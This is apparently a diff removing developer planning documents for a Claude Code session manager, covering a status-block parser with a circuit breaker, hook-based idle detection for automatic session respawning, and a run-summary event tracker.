||||
/everything\s+(?:is\s+)?(?:completed?|done)/i,
|
||||
];
|
||||
|
||||
// ---------- Priority Pattern ----------
|
||||
|
||||
const TODO_PRIORITY_PATTERN = /^\s*(?:\[.\])?\s*(?:Critical:|Blocker:|Feature:|Improvement:)?\s*\(?(P[012])\)?:?\s*/i;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. New State Properties (ralph-tracker.ts)
|
||||
|
||||
```typescript
|
||||
// Add to RalphTracker class
|
||||
|
||||
// Circuit breaker state tracking
|
||||
private _circuitBreaker: CircuitBreakerStatus;
|
||||
|
||||
// RALPH_STATUS block parsing state
|
||||
private _statusBlockBuffer: string[] = [];
|
||||
private _inStatusBlock: boolean = false;
|
||||
private _lastStatusBlock: RalphStatusBlock | null = null;
|
||||
|
||||
// Dual-condition exit tracking
|
||||
private _completionIndicators: number = 0;
|
||||
private _exitGateMet: boolean = false;
|
||||
|
||||
// Cumulative tracking
|
||||
private _totalFilesModified: number = 0;
|
||||
private _totalTasksCompleted: number = 0;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. New Methods to Implement
|
||||
|
||||
### 5.1 RALPH_STATUS Block Parsing
|
||||
|
||||
```typescript
|
||||
private processStatusBlockLine(line: string): void {
|
||||
const trimmed = line.trim();
|
||||
|
||||
if (RALPH_STATUS_START_PATTERN.test(trimmed)) {
|
||||
this._inStatusBlock = true;
|
||||
this._statusBlockBuffer = [];
|
||||
return;
|
||||
}
|
||||
|
||||
if (this._inStatusBlock && RALPH_STATUS_END_PATTERN.test(trimmed)) {
|
||||
this._inStatusBlock = false;
|
||||
this.parseStatusBlock(this._statusBlockBuffer);
|
||||
this._statusBlockBuffer = [];
|
||||
return;
|
||||
}
|
||||
|
||||
if (this._inStatusBlock) {
|
||||
this._statusBlockBuffer.push(trimmed);
|
||||
}
|
||||
}
|
||||
|
||||
private parseStatusBlock(lines: string[]): void {
|
||||
const block: Partial<RalphStatusBlock> = { parsedAt: Date.now() };
|
||||
|
||||
for (const line of lines) {
|
||||
// Parse each field...
|
||||
}
|
||||
|
||||
if (block.status !== undefined) {
|
||||
this._lastStatusBlock = fullBlock;
|
||||
this.handleStatusBlock(fullBlock);
|
||||
}
|
||||
}
|
||||
|
||||
private handleStatusBlock(block: RalphStatusBlock): void {
|
||||
this._totalFilesModified += block.filesModified;
|
||||
this._totalTasksCompleted += block.tasksCompletedThisLoop;
|
||||
|
||||
const hasProgress = block.filesModified > 0 || block.tasksCompletedThisLoop > 0;
|
||||
this.updateCircuitBreaker(hasProgress, block.testsStatus, block.status);
|
||||
|
||||
if (block.status === 'COMPLETE') {
|
||||
this._completionIndicators++;
|
||||
}
|
||||
|
||||
if (block.exitSignal && this._completionIndicators >= 2) {
|
||||
this._exitGateMet = true;
|
||||
this.emit('exitGateMet', { completionIndicators: this._completionIndicators, exitSignal: true });
|
||||
}
|
||||
|
||||
this.emit('statusBlockDetected', block);
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 Circuit Breaker Logic
|
||||
|
||||
```typescript
|
||||
private updateCircuitBreaker(
|
||||
hasProgress: boolean,
|
||||
testsStatus: RalphTestsStatus,
|
||||
status: RalphStatusValue
|
||||
): void {
|
||||
const prevState = this._circuitBreaker.state;
|
||||
|
||||
if (hasProgress) {
|
||||
this._circuitBreaker.consecutiveNoProgress = 0;
|
||||
this._circuitBreaker.lastProgressIteration = this._loopState.cycleCount;
|
||||
|
||||
if (this._circuitBreaker.state === 'HALF_OPEN') {
|
||||
this._circuitBreaker.state = 'CLOSED';
|
||||
this._circuitBreaker.reasonCode = 'progress_detected';
|
||||
}
|
||||
} else {
|
||||
this._circuitBreaker.consecutiveNoProgress++;
|
||||
|
||||
if (this._circuitBreaker.state === 'CLOSED') {
|
||||
if (this._circuitBreaker.consecutiveNoProgress >= 3) {
|
||||
this._circuitBreaker.state = 'OPEN';
|
||||
this._circuitBreaker.reasonCode = 'no_progress_open';
|
||||
} else if (this._circuitBreaker.consecutiveNoProgress >= 2) {
|
||||
this._circuitBreaker.state = 'HALF_OPEN';
|
||||
this._circuitBreaker.reasonCode = 'no_progress_warning';
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (prevState !== this._circuitBreaker.state) {
|
||||
this._circuitBreaker.lastTransitionAt = Date.now();
|
||||
this.emit('circuitBreakerUpdate', { ...this._circuitBreaker });
|
||||
}
|
||||
}
|
||||
|
||||
resetCircuitBreaker(): void {
|
||||
this._circuitBreaker = createInitialCircuitBreakerStatus();
|
||||
this._circuitBreaker.reasonCode = 'manual_reset';
|
||||
this.emit('circuitBreakerUpdate', { ...this._circuitBreaker });
|
||||
}
|
||||
```
|
||||
|
||||
### 5.3 Update processLine Method
|
||||
|
||||
```typescript
|
||||
private processLine(line: string): void {
|
||||
const trimmed = line.trim();
|
||||
if (!trimmed) return;
|
||||
|
||||
// NEW: Check for RALPH_STATUS block
|
||||
this.processStatusBlockLine(trimmed);
|
||||
|
||||
// NEW: Check for completion indicators
|
||||
this.detectCompletionIndicators(trimmed);
|
||||
|
||||
// EXISTING: Rest of the detection methods...
|
||||
this.detectCompletionPhrase(trimmed);
|
||||
this.detectAllTasksComplete(trimmed);
|
||||
this.detectTaskCompletion(trimmed);
|
||||
this.detectLoopStatus(trimmed);
|
||||
this.detectTodoItems(trimmed);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. New Events to Add
|
||||
|
||||
```typescript
|
||||
export interface RalphTrackerEvents {
|
||||
// Existing events
|
||||
loopUpdate: (state: RalphTrackerState) => void;
|
||||
todoUpdate: (todos: RalphTodoItem[]) => void;
|
||||
completionDetected: (phrase: string) => void;
|
||||
enabled: () => void;
|
||||
|
||||
// New events
|
||||
statusBlockDetected: (block: RalphStatusBlock) => void;
|
||||
circuitBreakerUpdate: (status: CircuitBreakerStatus) => void;
|
||||
exitGateMet: (data: { completionIndicators: number; exitSignal: boolean }) => void;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Server Integration (server.ts)
|
||||
|
||||
```typescript
|
||||
// Add new SSE event handlers in setupSessionListeners()
|
||||
|
||||
session.on('ralphStatusBlockDetected', (block: RalphStatusBlock) => {
|
||||
this.broadcast('session:ralphStatusUpdate', { sessionId: session.id, block });
|
||||
});
|
||||
|
||||
session.on('ralphCircuitBreakerUpdate', (status: CircuitBreakerStatus) => {
|
||||
this.broadcast('session:circuitBreakerUpdate', { sessionId: session.id, status });
|
||||
});
|
||||
|
||||
session.on('ralphExitGateMet', (data) => {
|
||||
this.broadcast('session:exitGateMet', { sessionId: session.id, ...data });
|
||||
});
|
||||
|
||||
// Add API endpoint for circuit breaker reset
|
||||
this.app.post('/api/sessions/:id/ralph-circuit-breaker/reset', async (req) => {
|
||||
const session = this.sessions.get(req.params.id);
|
||||
if (!session) return { success: false, error: 'Session not found' };
|
||||
|
||||
session.ralphTracker?.resetCircuitBreaker();
|
||||
return { success: true };
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. Frontend Changes (app.js)
|
||||
|
||||
### New SSE Event Listeners
|
||||
|
||||
```javascript
|
||||
this.eventSource.addEventListener('session:ralphStatusUpdate', (e) => {
|
||||
const data = JSON.parse(e.data);
|
||||
this.updateRalphStatusBlock(data.sessionId, data.block);
|
||||
});
|
||||
|
||||
this.eventSource.addEventListener('session:circuitBreakerUpdate', (e) => {
|
||||
const data = JSON.parse(e.data);
|
||||
this.updateCircuitBreaker(data.sessionId, data.status);
|
||||
});
|
||||
```
|
||||
|
||||
### New Rendering Methods
|
||||
|
||||
```javascript
|
||||
updateRalphStatusBlock(sessionId, block) {
|
||||
// Store and render status block
|
||||
}
|
||||
|
||||
renderRalphStatusBlock(block) {
|
||||
// Render STATUS, WORK_TYPE, TESTS_STATUS, RECOMMENDATION
|
||||
}
|
||||
|
||||
updateCircuitBreaker(sessionId, status) {
|
||||
// Store and render circuit breaker state
|
||||
}
|
||||
|
||||
renderCircuitBreaker(status) {
|
||||
// Render badge: green (CLOSED), yellow (HALF_OPEN), red (OPEN)
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Implementation Order
|
||||
|
||||
| Step | Task | Time |
|
||||
|------|------|------|
|
||||
| 1 | Add type definitions to `types.ts` | 30 min |
|
||||
| 2 | Add regex patterns to `ralph-tracker.ts` | 30 min |
|
||||
| 3 | Add state properties to RalphTracker class | 15 min |
|
||||
| 4 | Implement RALPH_STATUS parsing methods | 1.5 hr |
|
||||
| 5 | Implement circuit breaker logic | 1 hr |
|
||||
| 6 | Implement completion indicators | 30 min |
|
||||
| 7 | Update events interface | 15 min |
|
||||
| 8 | Add server SSE handlers and API endpoint | 45 min |
|
||||
| 9 | Add frontend event listeners and rendering | 1 hr |
|
||||
| 10 | Add CSS styles | 30 min |
|
||||
| 11 | Update HTML structure | 15 min |
|
||||
| 12 | Write unit tests | 1.5 hr |
|
||||
|
||||
**Total: ~8 hours**
|
||||
|
||||
---
|
||||
|
||||
## 10. Files to Modify
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/types.ts` | Add RalphStatusBlock, CircuitBreakerStatus, helper functions |
|
||||
| `src/ralph-tracker.ts` | Add patterns, state, parsing methods, circuit breaker |
|
||||
| `src/web/server.ts` | Add SSE handlers, circuit breaker reset endpoint |
|
||||
| `src/web/public/app.js` | Add event listeners, rendering methods |
|
||||
| `src/web/public/styles.css` | Add status block and circuit breaker styles |
|
||||
| `src/web/public/index.html` | Add UI elements to Ralph panel |
|
||||
| `test/ralph-tracker.test.ts` | Add tests for new functionality |
|
||||
|
||||
---
|
||||
|
||||
## 11. Test Cases to Add
|
||||
|
||||
1. **RALPH_STATUS Parsing**
|
||||
- Parse valid status block with all fields
|
||||
- Parse block with missing optional fields
|
||||
- Ignore malformed blocks
|
||||
- Handle multiple blocks in sequence
|
||||
|
||||
2. **Circuit Breaker State Transitions**
|
||||
- CLOSED → HALF_OPEN on 2 no-progress
|
||||
- HALF_OPEN → OPEN on 3 no-progress
|
||||
- HALF_OPEN → CLOSED on progress
|
||||
- Manual reset from OPEN
|
||||
|
||||
3. **Dual-Condition Exit Gate**
|
||||
- Exit when indicators >= 2 AND exitSignal = true
|
||||
- No exit when indicators >= 2 but exitSignal = false
|
||||
- No exit when exitSignal = true but indicators < 2
|
||||
|
||||
4. **Integration Tests**
|
||||
- SSE events broadcast correctly
|
||||
- UI updates on status block detection
|
||||
- Circuit breaker badge updates
|
||||
@@ -1,385 +0,0 @@
|
||||
# Respawn Controller Idle Detection Improvement Plan
|
||||
|
||||
## Executive Summary
|
||||
|
||||
The current respawn controller relies primarily on **parsing terminal output** to detect idle states. This approach is fragile and leads to false positives/negatives (e.g., the w3-reddit-analyse session).
|
||||
|
||||
**Key insight**: Claude Code provides **direct, authoritative signals** via hooks and files that definitively indicate session state. We're receiving some of these signals but not using them for idle detection!
|
||||
|
||||
---
|
||||
|
||||
## Current Detection Layers (What We Have)
|
||||
|
||||
| Layer | Signal | Source | Reliability |
|
||||
|-------|--------|--------|-------------|
|
||||
| 1 | Completion message ("Worked for Xm Xs") | Terminal parsing | Medium - can miss edge cases |
|
||||
| 2 | Output silence (configurable duration) | Terminal activity | Low - Claude can be processing silently |
|
||||
| 3 | Token stability | Terminal parsing | Low - tokens don't change during I/O waits |
|
||||
| 4 | Working pattern absence | Terminal parsing | Medium - patterns can be missed |
|
||||
| 5 | AI idle check | Spawned Claude CLI | High but slow (90s timeout) |
|
||||
|
||||
**Problem**: All layers depend on **parsing terminal output**, which is inherently unreliable.
|
||||
|
||||
---
|
||||
|
||||
## Available Claude Code Signals (Not Fully Utilized)
|
||||
|
||||
### 1. `Stop` Hook ⭐ CRITICAL - DEFINITIVE SIGNAL
|
||||
|
||||
**What it is**: Fires when the main Claude Code agent **finishes responding**.
|
||||
|
||||
**From docs**: "Runs when the main Claude Code agent has finished responding. Does not run if the stoppage occurred due to a user interrupt."
|
||||
|
||||
**Current status**: We receive it via `/api/hook-event` but **don't use it for idle detection**!
|
||||
|
||||
**Input received**:
|
||||
```json
|
||||
{
|
||||
"session_id": "abc123",
|
||||
"transcript_path": "~/.claude/projects/.../00893aaf.jsonl",
|
||||
"hook_event_name": "Stop",
|
||||
"stop_hook_active": true // Important for preventing loops
|
||||
}
|
||||
```
|
||||
|
||||
**Action needed**: The `Stop` hook should be the **PRIMARY** idle detection signal. When Claude fires Stop, the agent has definitively finished its response cycle.
|
||||
|
||||
### 2. `idle_prompt` Notification ⭐ HIGH VALUE
|
||||
|
||||
**What it is**: Fires after **60+ seconds of idle time** when Claude is waiting for user input.
|
||||
|
||||
**From docs**: "When Claude is waiting for user input (after 60+ seconds of idle time)"
|
||||
|
||||
**Current status**: We receive it but only forward it to the UI for notification display.
|
||||
|
||||
**Action needed**: Use `idle_prompt` as a **definitive confirmation** that Claude is idle. If we receive this, there's no need for AI idle checks or output silence timers.
|
||||
|
||||
### 3. Transcript JSONL File ⭐ HIGH VALUE
|
||||
|
||||
**What it is**: Complete conversation history at `~/.claude/projects/{project-hash}/{session-id}.jsonl`
|
||||
|
||||
**Current status**: We already watch subagent transcripts but **not the main session transcript**.
|
||||
|
||||
**Data available**:
|
||||
- Every message (user, assistant, system)
|
||||
- Every tool call with inputs/outputs
|
||||
- Progress events
|
||||
- Structured, parseable JSON
|
||||
|
||||
**Action needed**:
|
||||
- Monitor the main transcript file (path provided in every hook input)
|
||||
- Parse the last few entries to detect:
|
||||
- Tool completion
|
||||
- Assistant message completion
|
||||
- Error states
|
||||
- Plan mode prompts
|
||||
|
||||
### 4. `PostToolUse` Hook - Tool Completion Tracking
|
||||
|
||||
**What it is**: Fires immediately after any tool completes successfully.
|
||||
|
||||
**Use case**: Track exactly when tools finish to understand execution flow.
|
||||
|
||||
**Current status**: Not implemented.
|
||||
|
||||
**Action needed**: Add PostToolUse hooks to track tool completion events.
|
||||
|
||||
### 5. `SubagentStop` Hook - Background Agent Completion
|
||||
|
||||
**What it is**: Fires when a subagent (Task tool) finishes responding.
|
||||
|
||||
**Current status**: Not implemented in hooks config (we watch JSONL files separately).
|
||||
|
||||
**Action needed**: Add to hooks config for redundant detection.
|
||||
|
||||
### 6. `permission_prompt` and `elicitation_dialog` - Blocking State Detection
|
||||
|
||||
**What it is**: Fires when Claude needs user input (permission or question).
|
||||
|
||||
**Current status**: We receive and use for auto-accept blocking.
|
||||
|
||||
**Enhancement**: Use as definitive "Claude is NOT idle - it's waiting for user action".
|
||||
|
||||
---
|
||||
|
||||
## Proposed Architecture: Multi-Signal Idle Detection
|
||||
|
||||
### New Detection Hierarchy
|
||||
|
||||
```
|
||||
Priority 1 (Definitive):
|
||||
└── Stop hook received → CONFIRMED IDLE
|
||||
└── idle_prompt received → CONFIRMED IDLE (60s+ idle)
|
||||
|
||||
Priority 2 (Blocking):
|
||||
└── permission_prompt received → NOT IDLE (waiting for permission)
|
||||
└── elicitation_dialog received → NOT IDLE (waiting for answer)
|
||||
└── Working patterns in terminal → NOT IDLE
|
||||
|
||||
Priority 3 (Supporting):
|
||||
└── Transcript analysis → Check last entries for completion
|
||||
└── Output silence + token stability → Weak idle signal
|
||||
|
||||
Priority 4 (Fallback):
|
||||
└── AI idle check → Only if no definitive signals after timeout
|
||||
```
|
||||
|
||||
### State Machine Changes
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────┐
|
||||
│ │
|
||||
▼ │
|
||||
┌─────────────────────┐ │
|
||||
│ WATCHING │◄──────────────────────────────┤
|
||||
└─────────────────────┘ │
|
||||
│ │ │
|
||||
│ │ Stop hook or idle_prompt │
|
||||
│ └────────────────────────┐ │
|
||||
│ ▼ │
|
||||
│ Output silence ┌────────────┐ │
|
||||
│ (no definitive signals) │ HOOK_IDLE │───────┤
|
||||
│ └────────────┘ │
|
||||
▼ (skip AI check) │
|
||||
┌────────────────────┐ │
|
||||
│ CONFIRMING_IDLE │ │
|
||||
└────────────────────┘ │
|
||||
│ │
|
||||
│ Silence confirmed │
|
||||
▼ │
|
||||
┌────────────────────┐ │
|
||||
│ AI_CHECKING │──── IDLE verdict ─────────────┤
|
||||
└────────────────────┘ │
|
||||
│ │
|
||||
│ WORKING verdict │
|
||||
└─────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### New State: `hook_idle`
|
||||
|
||||
When a definitive hook signal is received:
|
||||
1. Skip AI idle check entirely (saves time and API calls)
|
||||
2. Short confirmation period (2-3s) to handle race conditions
|
||||
3. Proceed directly to respawn sequence
|
||||
|
||||
---
|
||||
|
||||
## Implementation Plan
|
||||
|
||||
### Phase 1: Use Stop Hook for Idle Detection ✅ COMPLETED
|
||||
|
||||
**Files modified**:
|
||||
- `src/respawn-controller.ts`
|
||||
- `src/web/server.ts`
|
||||
- `test/respawn-controller.test.ts`
|
||||
|
||||
**Changes implemented**:
|
||||
1. Added `stopHookReceived`, `stopHookTime`, `idlePromptReceived`, `idlePromptTime` fields to `DetectionStatus`
|
||||
2. Added `hookConfirmTimer` for short confirmation after hook signal (3s)
|
||||
3. Added `signalStopHook()` method:
|
||||
- Sets `stopHookReceived = true` and timestamp
|
||||
- Cancels any running AI check (hook is definitive)
|
||||
- Starts 3s confirmation timer
|
||||
- If no new output during confirmation → triggers respawn cycle
|
||||
4. Added `signalIdlePrompt()` method:
|
||||
- Sets `idlePromptReceived = true` and timestamp
|
||||
- Immediately confirms idle (skips confirmation timer - 60s+ already proven)
|
||||
5. Added `resetHookState()` to clear hook flags on:
|
||||
- Controller start
|
||||
- Working patterns detected
|
||||
- Cycle completion
|
||||
6. Updated server.ts `/api/hook-event` endpoint to call:
|
||||
- `controller.signalStopHook()` for `stop` events
|
||||
- `controller.signalIdlePrompt()` for `idle_prompt` events
|
||||
7. Updated `getDetectionStatus()`:
|
||||
- Returns hook signal states
|
||||
- Sets confidence to 100% when hook received
|
||||
- Updates statusText to show hook status
|
||||
|
||||
**Tests added** (9 new tests in `RespawnController Hook-Based Idle Detection` describe block):
|
||||
- `should expose signalStopHook method`
|
||||
- `should expose signalIdlePrompt method`
|
||||
- `should set stopHookReceived in detection status when Stop hook signaled`
|
||||
- `should include hook status in statusText when Stop hook received`
|
||||
- `should trigger respawn cycle after Stop hook confirmation`
|
||||
- `should immediately confirm idle when idle_prompt signaled (skip confirmation)`
|
||||
- `should cancel Stop hook confirmation if working patterns detected`
|
||||
- `should ignore Stop hook when not in watching state`
|
||||
- `should have 100% confidence when hook signal is received`
|
||||
|
||||
**Detection status update** (implemented):
|
||||
```typescript
|
||||
interface DetectionStatus {
|
||||
/** Layer 0: Stop hook received (highest priority - definitive signal) */
|
||||
stopHookReceived: boolean;
|
||||
stopHookTime: number | null;
|
||||
/** Layer 0: idle_prompt notification received (definitive signal) */
|
||||
idlePromptReceived: boolean;
|
||||
idlePromptTime: number | null;
|
||||
|
||||
// Existing fields...
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 2: Use idle_prompt for Definitive Idle ✅ COMPLETED (in Phase 1)
|
||||
|
||||
**Already implemented in Phase 1**:
|
||||
1. `signalIdlePrompt()` method sets `idlePromptReceived = true`
|
||||
2. Immediately calls `onIdleConfirmed()` - skips all other detection
|
||||
3. Server.ts calls `controller.signalIdlePrompt()` when `idle_prompt` event received
|
||||
4. 60s+ of Claude waiting = definitive idle signal
|
||||
|
||||
### Phase 3: Transcript File Monitoring ✅ COMPLETED
|
||||
|
||||
**New file**: `src/transcript-watcher.ts`
|
||||
|
||||
**Functionality implemented**:
|
||||
1. Watch the session's transcript JSONL file using `fs.watch()`
|
||||
2. Parse new entries as they're appended (incremental reading from last position)
|
||||
3. Detect:
|
||||
- `result` entry → `transcript:complete` event (isComplete = true)
|
||||
- `tool_use` content block → `transcript:tool_start` event
|
||||
- `tool_result` content block → `transcript:tool_end` event
|
||||
- `AskUserQuestion` or `ExitPlanMode` tools → `transcript:plan_mode` event
|
||||
- Error conditions in result entries
|
||||
4. Emit structured events consumed by respawn controller
|
||||
|
||||
**Integration implemented**:
|
||||
- `transcript_path` added to allowed hook data fields in `sanitizeHookData()`
|
||||
- `transcriptWatchers` Map added to WebServer for per-session watchers
|
||||
- `startTranscriptWatcher()` creates watcher and wires up events:
|
||||
- `transcript:complete` → `controller.signalTranscriptComplete()`
|
||||
- `transcript:plan_mode` → `controller.signalTranscriptPlanMode()`
|
||||
- `stopTranscriptWatcher()` cleans up on session cleanup
|
||||
- Hook events with `transcript_path` automatically start watching
|
||||
|
||||
**RespawnController methods added**:
|
||||
- `signalTranscriptComplete()` - Supporting signal that can accelerate idle detection
|
||||
- `signalTranscriptPlanMode()` - Cancels auto-accept timer (like elicitation)
|
||||
|
||||
**Tests added** (13 tests in `test/transcript-watcher.test.ts`):
|
||||
- Initialization tests
|
||||
- File watching tests (existing file, non-existent file, stop, updatePath)
|
||||
- Entry processing tests (user entry, result entry, tool execution, plan mode, errors)
|
||||
- State management tests
|
||||
|
||||
### Phase 4: Enhanced Hook Configuration
|
||||
|
||||
**Update `src/hooks-config.ts`**:
|
||||
|
||||
```typescript
|
||||
export function generateHooksConfig(): { hooks: Record<string, unknown[]> } {
|
||||
return {
|
||||
hooks: {
|
||||
Notification: [
|
||||
{ matcher: 'idle_prompt', hooks: [...] },
|
||||
{ matcher: 'permission_prompt', hooks: [...] },
|
||||
{ matcher: 'elicitation_dialog', hooks: [...] },
|
||||
],
|
||||
Stop: [{ hooks: [...] }],
|
||||
// NEW: Add these
|
||||
PostToolUse: [
|
||||
{ matcher: '*', hooks: [...] } // Track all tool completions
|
||||
],
|
||||
SubagentStop: [{ hooks: [...] }],
|
||||
PreCompact: [
|
||||
{ matcher: '*', hooks: [...] } // Track compaction
|
||||
],
|
||||
},
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Confidence Scoring Overhaul
|
||||
|
||||
Replace current confidence calculation with weighted signals:
|
||||
|
||||
```typescript
|
||||
function calculateConfidence(): number {
|
||||
let confidence = 0;
|
||||
|
||||
// Definitive signals (100% confidence)
|
||||
if (this.stopHookReceived) confidence = 100;
|
||||
if (this.idlePromptReceived) confidence = 100;
|
||||
|
||||
// Blocking signals (0% confidence)
|
||||
if (this.permissionPromptReceived) return 0;
|
||||
if (this.elicitationReceived) return 0;
|
||||
if (this.workingPatternRecent) return 0;
|
||||
|
||||
// Supporting signals (build up to ~80%)
|
||||
if (confidence < 100) {
|
||||
if (this.outputSilent) confidence += 30;
|
||||
if (this.tokensStable) confidence += 20;
|
||||
if (this.transcriptShowsCompletion) confidence += 30;
|
||||
}
|
||||
|
||||
return Math.min(100, confidence);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Expected Benefits
|
||||
|
||||
| Metric | Current | After Implementation |
|
||||
|--------|---------|---------------------|
|
||||
| False positive rate | ~15-20% | <5% |
|
||||
| Detection latency | 10-90s (AI check) | 3-5s (hook-based) |
|
||||
| API calls for AI check | Every idle detection | Only when hooks unavailable |
|
||||
| Reliability | Medium | High (definitive signals) |
|
||||
|
||||
---
|
||||
|
||||
## Testing Strategy
|
||||
|
||||
### Unit Tests
|
||||
1. `Stop` hook triggers immediate idle confirmation
|
||||
2. `idle_prompt` skips all other detection
|
||||
3. `permission_prompt` blocks idle detection
|
||||
4. Transcript parsing correctly identifies completion
|
||||
5. Fallback to AI check when no hooks received
|
||||
|
||||
### Integration Tests
|
||||
1. End-to-end with real Claude session
|
||||
2. Hook event delivery and handling
|
||||
3. Transcript file monitoring
|
||||
4. Race condition handling
|
||||
|
||||
### Scenarios to Test
|
||||
1. Normal completion → Stop hook → respawn
|
||||
2. Long-running task → idle_prompt → respawn
|
||||
3. Permission needed → wait for user action
|
||||
4. AskUserQuestion → wait for user answer
|
||||
5. Plan mode → auto-accept → continue
|
||||
6. Hooks disabled/unavailable → fallback to AI check
|
||||
|
||||
---
|
||||
|
||||
## Migration Path
|
||||
|
||||
1. **Implement Phase 1** - Stop hook detection (low risk, high value)
|
||||
2. **Deploy and monitor** - Verify Stop hooks are reliable
|
||||
3. **Implement Phase 2** - idle_prompt (simple addition)
|
||||
4. **Implement Phase 3** - Transcript monitoring (more complex)
|
||||
5. **Implement Phase 4** - Enhanced hooks (optional, for completeness)
|
||||
6. **Implement Phase 5** - Refactor confidence scoring
|
||||
|
||||
---
|
||||
|
||||
## Open Questions
|
||||
|
||||
1. **Stop hook reliability**: Does it fire 100% of the time? Edge cases?
|
||||
2. **Transcript file location**: Always at the path in hook input?
|
||||
3. **Hook delivery latency**: How quickly do hooks fire after state change?
|
||||
4. **Race conditions**: What if Stop hook and new work happen simultaneously?
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
- [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)
|
||||
- [Agent SDK Documentation](https://platform.claude.com/docs/en/agent-sdk/overview)
|
||||
- Current implementation: `src/respawn-controller.ts`
|
||||
- Hooks config: `src/hooks-config.ts`
|
||||
- Subagent watcher: `src/subagent-watcher.ts`
|
||||
@@ -1,172 +0,0 @@
|
||||
# Run Summary Feature - Implementation Plan
|
||||
|
||||
## Overview
|
||||
|
||||
The Run Summary feature provides users with a consolidated view of what happened in their session while they were away. It tracks significant events, issues, and statistics, presenting them in an easy-to-digest format.
|
||||
|
||||
## Data Structures
|
||||
|
||||
### RunSummaryEventType
|
||||
```typescript
|
||||
type RunSummaryEventType =
|
||||
| 'session_started'
|
||||
| 'session_stopped'
|
||||
| 'respawn_cycle_started'
|
||||
| 'respawn_cycle_completed'
|
||||
| 'respawn_state_change'
|
||||
| 'error'
|
||||
| 'warning'
|
||||
| 'token_milestone'
|
||||
| 'auto_compact'
|
||||
| 'auto_clear'
|
||||
| 'idle_detected'
|
||||
| 'working_detected'
|
||||
| 'ralph_completion'
|
||||
| 'ai_check_result'
|
||||
| 'hook_event'
|
||||
| 'state_stuck';
|
||||
```
|
||||
|
||||
### RunSummaryEvent
|
||||
```typescript
|
||||
interface RunSummaryEvent {
|
||||
id: string;
|
||||
timestamp: number;
|
||||
type: RunSummaryEventType;
|
||||
severity: 'info' | 'warning' | 'error' | 'success';
|
||||
title: string;
|
||||
details?: string;
|
||||
metadata?: Record<string, unknown>;
|
||||
}
|
||||
```
|
||||
|
||||
### RunSummary
|
||||
```typescript
|
||||
interface RunSummary {
|
||||
sessionId: string;
|
||||
sessionName: string;
|
||||
startedAt: number;
|
||||
lastUpdatedAt: number;
|
||||
events: RunSummaryEvent[];
|
||||
stats: {
|
||||
totalRespawnCycles: number;
|
||||
totalTokensUsed: number;
|
||||
peakTokens: number;
|
||||
totalTimeActiveMs: number;
|
||||
totalTimeIdleMs: number;
|
||||
errorCount: number;
|
||||
warningCount: number;
|
||||
aiCheckCount: number;
|
||||
lastIdleAt: number | null;
|
||||
lastWorkingAt: number | null;
|
||||
stateTransitions: number;
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## Files to Create/Modify
|
||||
|
||||
### 1. `src/run-summary.ts` (NEW)
|
||||
- `RunSummaryTracker` class
|
||||
- Event tracking and aggregation
|
||||
- Statistics calculation
|
||||
- Max 1000 events per session (FIFO trimming)
|
||||
|
||||
### 2. `src/types.ts` (MODIFY)
|
||||
- Add `RunSummaryEvent`, `RunSummaryEventType`, `RunSummary` interfaces
|
||||
- Add `RunSummaryEventSeverity` type
|
||||
|
||||
### 3. `src/web/server.ts` (MODIFY)
|
||||
- Create `RunSummaryTracker` per session
|
||||
- Subscribe to session events and forward to tracker
|
||||
- Subscribe to respawn controller events
|
||||
- Add API endpoint: `GET /api/sessions/:id/run-summary`
|
||||
- Broadcast `session:runSummaryUpdate` SSE event
|
||||
|
||||
### 4. `src/web/public/app.js` (MODIFY)
|
||||
- Add "Run Summary" button to session header
|
||||
- Create modal to display summary
|
||||
- Handle `session:runSummaryUpdate` SSE event
|
||||
- Timeline view for events
|
||||
- Stats cards at top
|
||||
|
||||
### 5. `src/web/public/index.html` (MODIFY)
|
||||
- Add modal HTML structure for run summary
|
||||
|
||||
### 6. `src/web/public/styles.css` (MODIFY)
|
||||
- Styles for run summary modal and timeline
|
||||
|
||||
## Event Sources
|
||||
|
||||
| Event Type | Source | Trigger |
|
||||
|------------|--------|---------|
|
||||
| session_started | Session | `startInteractive()` / `startShell()` |
|
||||
| session_stopped | Session | `stop()` |
|
||||
| respawn_cycle_started | RespawnController | State → `sending_update` |
|
||||
| respawn_cycle_completed | RespawnController | State → `watching` (after cycle) |
|
||||
| respawn_state_change | RespawnController | Any state transition |
|
||||
| error | Various | Errors caught in try/catch |
|
||||
| warning | RunSummaryTracker | State stuck > 5min, high tokens |
|
||||
| token_milestone | Session | Every 50k tokens |
|
||||
| auto_compact | Session | `autoCompact` event |
|
||||
| auto_clear | Session | `autoClear` event |
|
||||
| idle_detected | Session | `idle` event |
|
||||
| working_detected | Session | `working` event |
|
||||
| ralph_completion | RalphTracker | `completionDetected` event |
|
||||
| ai_check_result | RespawnController | AI check completes |
|
||||
| hook_event | Server | `/api/hook-event` endpoint |
|
||||
| state_stuck | RunSummaryTracker | Same state > 10min |
|
||||
|
||||
## API Endpoint
|
||||
|
||||
### GET /api/sessions/:id/run-summary
|
||||
Returns the full run summary for a session.
|
||||
|
||||
Response:
|
||||
```json
|
||||
{
|
||||
"success": true,
|
||||
"summary": {
|
||||
"sessionId": "...",
|
||||
"sessionName": "...",
|
||||
"startedAt": 1234567890,
|
||||
"lastUpdatedAt": 1234567890,
|
||||
"events": [...],
|
||||
"stats": {...}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## UI Design
|
||||
|
||||
### Summary Modal
|
||||
- Header: Session name, duration, status indicator
|
||||
- Stats Cards Row:
|
||||
- Respawn Cycles: count
|
||||
